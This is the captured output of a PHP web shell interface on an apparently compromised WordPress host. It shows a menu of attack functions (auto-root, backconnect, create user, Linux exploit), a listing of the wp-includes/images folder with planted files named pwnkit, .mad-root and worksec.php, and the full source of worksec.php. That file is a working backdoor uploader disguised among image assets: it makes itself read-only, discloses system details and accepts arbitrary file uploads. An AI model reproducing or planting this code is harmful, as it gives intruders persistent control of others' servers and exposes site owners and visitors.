Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-includes /
images /
[ HOME SHELL ]
Name
Size
Permission
Action
crystal
[ DIR ]
drwxr-xr-x
icon-library
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
smilies
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-bar-sprite-2x.png
3.91
KB
-rw-r--r--
admin-bar-sprite.png
2.41
KB
-rw-r--r--
arrow-pointer-blue-2x.png
1.63
KB
-rw-r--r--
arrow-pointer-blue.png
793
B
-rw-r--r--
blank.gif
43
B
-rw-r--r--
down_arrow-2x.gif
84
B
-rw-r--r--
down_arrow.gif
59
B
-rw-r--r--
icon-pointer-flag-2x.png
1.34
KB
-rw-r--r--
icon-pointer-flag.png
783
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rss-2x.png
1.28
KB
-rw-r--r--
rss.png
608
B
-rw-r--r--
spinner-2x.gif
7.36
KB
-rw-r--r--
spinner.gif
3.57
KB
-rw-r--r--
toggle-arrow-2x.png
354
B
-rw-r--r--
toggle-arrow.png
289
B
-rw-r--r--
uploader-icons-2x.png
3.46
KB
-rw-r--r--
uploader-icons.png
1.52
KB
-rw-r--r--
w-logo-blue-white-bg.png
4.02
KB
-rw-r--r--
w-logo-blue.png
3.04
KB
-rw-r--r--
worksec.php
1.06
KB
-r--r--r--
wpicons-2x.png
14.58
KB
-rw-r--r--
wpicons.png
6.92
KB
-rw-r--r--
wpspin-2x.gif
8.67
KB
-rw-r--r--
wpspin.gif
2
KB
-rw-r--r--
xit-2x.gif
825
B
-rw-r--r--
xit.gif
181
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close